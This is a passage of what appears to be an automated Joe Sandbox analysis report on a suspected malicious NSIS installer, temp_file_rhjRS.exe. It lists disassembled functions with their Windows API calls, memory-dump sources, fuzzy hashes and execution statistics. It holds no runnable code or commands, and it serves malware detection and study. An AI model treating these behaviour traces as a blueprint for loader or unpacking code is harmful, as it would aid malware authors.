Function 100018A9 Relevance: 7.7, APIs: 5, Instructions: 189COMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(?), ref: 10001908
GlobalFree.KERNEL32(?), ref: 10001A93
GlobalFree.KERNEL32(?), ref: 10001A98

Memory Dump Source

Source File: 00000002.00000002.2755512550.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.2755474942.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2755550727.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2755581887.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_temp_file_rhjRS.jbxd

Similarity

API ID: FreeGlobal
String ID:
API String ID: 2979337801-0
Opcode ID: fe7133a2f93821227e3a7e703367dd144469a15fe8ff947d0f1e508e715dc704
Instruction ID: 56de187798276af1e94fdae5c91d23c4da0ac5596926d43ddda2a484f8c4ba85
Opcode Fuzzy Hash: fe7133a2f93821227e3a7e703367dd144469a15fe8ff947d0f1e508e715dc704
Instruction Fuzzy Hash: 82511336E06115ABFB14DFA488908EEBBF5FF863D0F16406AE801B315DD6706F809792

Function 100022D0 Relevance: 7.6, APIs: 5, Instructions: 135memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32(00000000), ref: 10002411

Part of subcall function 1000122C: lstrcpynW.KERNEL32(00000000,?,100012DF,00000019,100011BE,-000000A0), ref: 1000123C

GlobalAlloc.KERNEL32(00000040), ref: 10002397
WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,?,00000000,00000000), ref: 100023B2

Memory Dump Source

Source File: 00000002.00000002.2755512550.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.2755474942.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2755550727.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2755581887.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_temp_file_rhjRS.jbxd

Similarity

API ID: Global$AllocByteCharFreeMultiWidelstrcpyn
String ID:
API String ID: 4216380887-0
Opcode ID: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
Instruction ID: e010a8171ff36a63e9221139458dc5df23460d7ee6f57f6168b5e09891e1807c
Opcode Fuzzy Hash: 40c1fda0fc222d3deaf0be0606799ffba2a33d40f74f168943dcfaeb9bc9158e
Instruction Fuzzy Hash: 9141D2B4408305EFF324DF24C880A6AB7F8FB843D4B11892DF94687199DB34BA94CB65

Function 100015FF Relevance: 7.5, APIs: 5, Instructions: 41memorylibraryloaderCOMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,00000808,00000000,?,00000000,10002148,?,00000808), ref: 10001617
GlobalAlloc.KERNEL32(00000040,00000000,?,00000000,10002148,?,00000808), ref: 1000161E
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000000,00000000,00000000,?,00000000,10002148,?,00000808), ref: 10001632
GetProcAddress.KERNEL32(10002148,00000000), ref: 10001639
GlobalFree.KERNEL32(00000000), ref: 10001642

Memory Dump Source

Source File: 00000002.00000002.2755512550.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.2755474942.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2755550727.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2755581887.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_temp_file_rhjRS.jbxd

Similarity

API ID: ByteCharGlobalMultiWide$AddressAllocFreeProc
String ID:
API String ID: 1148316912-0
Opcode ID: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
Instruction ID: 7647a3e7d8fb005f6fbf822ef0874fdc4783f8eaf5d0662476f5196d1f8db515
Opcode Fuzzy Hash: 06a7266b7a9176b24ef6afb6e544002b11bc6a2d13ae022cf9eb1808419c0062
Instruction Fuzzy Hash: 7CF098722071387BE62117A78C8CD9BBF9CDF8B2F5B114215F628921A4C6619D019BF1

Function 00405BDB Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsx8568.tmp,?,00405C4F,C:\Users\user\AppData\Local\Temp\nsx8568.tmp,C:\Users\user\AppData\Local\Temp\nsx8568.tmp,?,?,75923420,0040598D,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405BE9
CharNextW.USER32(00000000), ref: 00405BEE
CharNextW.USER32(00000000), ref: 00405C06

Strings

C:\Users\user\AppData\Local\Temp\nsx8568.tmp, xrefs: 00405BDC

Memory Dump Source

Source File: 00000002.00000002.2736807094.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2736769637.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736909876.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000077C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000782000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000786000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000789000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007AA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007B3000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2737596592.00000000007DB000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_file_rhjRS.jbxd

Similarity

API ID: CharNext
String ID: C:\Users\user\AppData\Local\Temp\nsx8568.tmp
API String ID: 3213498283-2839081440
Opcode ID: aebd7a4b5de8b759b0e4f0e56dc0d79cfb69ab96c88f82fda94e21a8a16d65f8
Instruction ID: 1410c8af8588119ed7c7bec0a33194e6879e2746ee2e5cb83f2c5ed70d44d846
Opcode Fuzzy Hash: aebd7a4b5de8b759b0e4f0e56dc0d79cfb69ab96c88f82fda94e21a8a16d65f8
Instruction Fuzzy Hash: 26F09022918B2D95FF3177584C55E7766B8EB55760B00803BE641B72C0D3F85C818EAA

Function 00405B30 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040333D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,0040359C,?,00000006,00000008,0000000A), ref: 00405B36
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040333D,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,75923420,0040359C,?,00000006,00000008,0000000A), ref: 00405B40
lstrcatW.KERNEL32(?,0040A014,?,00000006,00000008,0000000A), ref: 00405B52

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00405B30

Memory Dump Source

Source File: 00000002.00000002.2736807094.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2736769637.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736909876.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000077C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000782000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000786000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000789000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007AA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007B3000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2737596592.00000000007DB000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_file_rhjRS.jbxd

Similarity

API ID: CharPrevlstrcatlstrlen
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 2659869361-823278215
Opcode ID: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
Instruction ID: 96ba7b99f7925edb235d18d004fc1fe51c5fb87b1b333c4bf7b8a2937e57358f
Opcode Fuzzy Hash: 2d89e3346713fcbf25affea4869717dbbf7bb0cb650dc976aff6b925dbbb9e25
Instruction Fuzzy Hash: 44D05E21101924AAC1117B448C04EDF72ACAE45344342007AF241B30A1CB78295286FD

Function 00402E5D Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000,00000000,0040303D,00000001,?,00000006,00000008,0000000A), ref: 00402E70
GetTickCount.KERNEL32 ref: 00402E8E
CreateDialogParamW.USER32(0000006F,00000000,00402DD7,00000000), ref: 00402EAB
ShowWindow.USER32(00000000,00000005,?,00000006,00000008,0000000A), ref: 00402EB9

Memory Dump Source

Source File: 00000002.00000002.2736807094.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2736769637.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736909876.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000077C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000782000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000786000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000789000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007AA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007B3000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2737596592.00000000007DB000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_file_rhjRS.jbxd

Similarity

API ID: Window$CountCreateDestroyDialogParamShowTick
String ID:
API String ID: 2102729457-0
Opcode ID: fb346d16a057b98ea5efc0227cce21c5f766e4cb6d5f8b71d3ef2c60fce90910
Instruction ID: 7afe0c5cdde3553510745d2e994aff72f2021582eecc7c7a9da0eee8c5fdd21f
Opcode Fuzzy Hash: fb346d16a057b98ea5efc0227cce21c5f766e4cb6d5f8b71d3ef2c60fce90910
Instruction Fuzzy Hash: B3F05E30966A21EBC6616B24FE8C99B7B64AB44B41B15887BF041B11B8DA784891CBDC

Function 00405C38 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0040625F: lstrcpynW.KERNEL32(?,?,00000400,00403421,007A7A20,NSIS Error,?,00000006,00000008,0000000A), ref: 0040626C

Part of subcall function 00405BDB: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nsx8568.tmp,?,00405C4F,C:\Users\user\AppData\Local\Temp\nsx8568.tmp,C:\Users\user\AppData\Local\Temp\nsx8568.tmp,?,?,75923420,0040598D,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405BE9
Part of subcall function 00405BDB: CharNextW.USER32(00000000), ref: 00405BEE
Part of subcall function 00405BDB: CharNextW.USER32(00000000), ref: 00405C06

lstrlenW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsx8568.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsx8568.tmp,C:\Users\user\AppData\Local\Temp\nsx8568.tmp,?,?,75923420,0040598D,?,C:\Users\user\AppData\Local\Temp\,75923420,00000000), ref: 00405C91
GetFileAttributesW.KERNEL32(C:\Users\user\AppData\Local\Temp\nsx8568.tmp,C:\Users\user\AppData\Local\Temp\nsx8568.tmp,C:\Users\user\AppData\Local\Temp\nsx8568.tmp,C:\Users\user\AppData\Local\Temp\nsx8568.tmp,C:\Users\user\AppData\Local\Temp\nsx8568.tmp,C:\Users\user\AppData\Local\Temp\nsx8568.tmp,00000000,C:\Users\user\AppData\Local\Temp\nsx8568.tmp,C:\Users\user\AppData\Local\Temp\nsx8568.tmp,?,?,75923420,0040598D,?,C:\Users\user\AppData\Local\Temp\,75923420), ref: 00405CA1

Strings

C:\Users\user\AppData\Local\Temp\nsx8568.tmp, xrefs: 00405C3E, 00405C43, 00405C49, 00405C8A, 00405C90, 00405C98, 00405CA0

Memory Dump Source

Source File: 00000002.00000002.2736807094.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2736769637.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736909876.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000077C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000782000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000786000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000789000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007AA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007B3000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2737596592.00000000007DB000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_file_rhjRS.jbxd

Similarity

API ID: CharNext$AttributesFilelstrcpynlstrlen
String ID: C:\Users\user\AppData\Local\Temp\nsx8568.tmp
API String ID: 3248276644-2839081440
Opcode ID: 2fc0a06e40463135d25c9bc8da77120e69662948dae603a13584a31230773222
Instruction ID: 07588a96ba491492048338639ced47dd8f75e02a3aa2c86f807570fea5ede87b
Opcode Fuzzy Hash: 2fc0a06e40463135d25c9bc8da77120e69662948dae603a13584a31230773222
Instruction Fuzzy Hash: 3FF0D125008F1115E72233361D49EAF2664CE96360B1A023FF952B12D1DB3C99939C6E

Function 004038D8 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON

Download Yara Rule

APIs

FreeLibrary.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00000000,75923420,004038B0,004036C6,00000006,?,00000006,00000008,0000000A), ref: 004038F2
GlobalFree.KERNEL32(00A57918), ref: 004038F9

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 004038EA

Memory Dump Source

Source File: 00000002.00000002.2736807094.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2736769637.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736909876.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000077C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000782000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000786000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000789000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007AA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007B3000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2737596592.00000000007DB000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_file_rhjRS.jbxd

Similarity

API ID: Free$GlobalLibrary
String ID: C:\Users\user\AppData\Local\Temp\
API String ID: 1100898210-823278215
Opcode ID: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
Instruction ID: 0fbf8731d8bad765cb9f744f6f02bb9fbed9ce401ee6a58d62f233990fc3ff23
Opcode Fuzzy Hash: 4b08b810d440714d2b51308f6ef11deb4a674dc1e9eb6c71d827c8d8e3b91fd9
Instruction Fuzzy Hash: 31E01D334011205BC6115F55FD0475A77685F44B36F15407BF9847717147B45C535BD8

Function 00405B7C Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp,00402F2D,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe,C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405B82
CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp,00402F2D,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp,C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe,C:\Users\user\AppData\Local\Temp\temp_file_rhjRS.exe,80000000,00000003,?,00000006,00000008,0000000A), ref: 00405B92

Strings

C:\Users\user\AppData\Local\Temp, xrefs: 00405B7C

Memory Dump Source

Source File: 00000002.00000002.2736807094.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2736769637.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736909876.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000077C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000782000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000786000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000789000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007AA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007B3000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2737596592.00000000007DB000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_file_rhjRS.jbxd

Similarity

API ID: CharPrevlstrlen
String ID: C:\Users\user\AppData\Local\Temp
API String ID: 2709904686-1943935188
Opcode ID: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
Instruction ID: 52ec536bf7c92ef41efc45dde312f484f3c591b0d09bb1e57af7322ca826a5e1
Opcode Fuzzy Hash: ce420ed133ef401578f7edf27e8b1e41d4059e21aeef7803f585746dd391eaaa
Instruction Fuzzy Hash: 85D05EB24009209AD3126704DC00DAF77B8EF11310746446AE840A6166D7787C818AAC

Function 100010E1 Relevance: 5.1, APIs: 4, Instructions: 104memoryCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,?), ref: 1000116A
GlobalFree.KERNEL32(00000000), ref: 100011C7
GlobalFree.KERNEL32(00000000), ref: 100011D9
GlobalFree.KERNEL32(?), ref: 10001203

Memory Dump Source

Source File: 00000002.00000002.2755512550.0000000010001000.00000020.00000001.01000000.00000007.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.2755474942.0000000010000000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2755550727.0000000010003000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2755581887.0000000010005000.00000002.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_10000000_temp_file_rhjRS.jbxd

Similarity

API ID: Global$Free$Alloc
String ID:
API String ID: 1780285237-0
Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765

Function 00405CB6 Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000), ref: 00405CC6
lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405CDE
CharNextA.USER32(00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000), ref: 00405CEF
lstrlenA.KERNEL32(00000000,?,00000000,00405F9F,00000000,[Rename],00000000,00000000,00000000), ref: 00405CF8

Memory Dump Source

Source File: 00000002.00000002.2736807094.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.2736769637.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736909876.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000040A000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.000000000077C000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000782000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000786000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.0000000000789000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A4000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007A6000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007AA000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007B3000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2736968869.00000000007D9000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000002.00000002.2737596592.00000000007DB000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_temp_file_rhjRS.jbxd

Similarity

API ID: lstrlen$CharNextlstrcmpi
String ID:
API String ID: 190613189-0
Opcode ID: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
Instruction ID: 3ccce89ec89fcd17ace6fe24ed26798b8253689363ac01c92f586b0f3661b096
Opcode Fuzzy Hash: 6db5b03da17fe1faae21ad7e2c869b7ed7bb68520138c246bcc2ad94f2104a67
Instruction Fuzzy Hash: 81F0F631204958FFC7029FA8DD04D9FBBA8EF16354B2540BAE840F7211D634EE01ABA8

Analysis Process: temp_file_rhjRS.exePID: 5360, Parent PID: 5616COMMON

Execution Graph

Execution Coverage:	0%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	22.2%
Total number of Nodes:	126
Total number of Limit Nodes:	0

Executed Functions

Function 355235C0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 355235CA

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 59eaa4a064b8d0103fe6ffc42c567540c7b48c0efe6a429bb965bb4c8e9aaebc
Instruction ID: f1b73b26d7a8cb68c801779cebe5025c29a3b44d98737d93ebb1ffa5688071b2
Opcode Fuzzy Hash: 59eaa4a064b8d0103fe6ffc42c567540c7b48c0efe6a429bb965bb4c8e9aaebc
Instruction Fuzzy Hash: 0490023260750402D10471584515706116547D0211FA9C452A0468568D8B959A5575A2

Function 35522DF0 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 35522DFA

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: d520ce146f165fe4a55f3979348893294b2f3c571a5d58ce56782a6b85f10680
Instruction ID: c95a07a10f6d25be461979a8b6b875e93c64995d355fd4bdb21def51ccc88168
Opcode Fuzzy Hash: d520ce146f165fe4a55f3979348893294b2f3c571a5d58ce56782a6b85f10680
Instruction Fuzzy Hash: 0790023220340413D11571584505707016947D0251FD9C453A0468558D9A569A56B121

Function 35522C70 Relevance: 1.5, APIs: 1, Instructions: 4
libraryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrInitializeThunk.NTDLL ref: 35522C7A

Memory Dump Source

Source File: 00000005.00000002.3335713924.00000000354B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 354B0000, based on PE: true

Associated: 00000005.00000002.3335713924.00000000355D9000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.00000000355DD000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000005.00000002.3335713924.000000003564E000.00000040.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_354b0000_temp_file_rhjRS.jbxd

Similarity

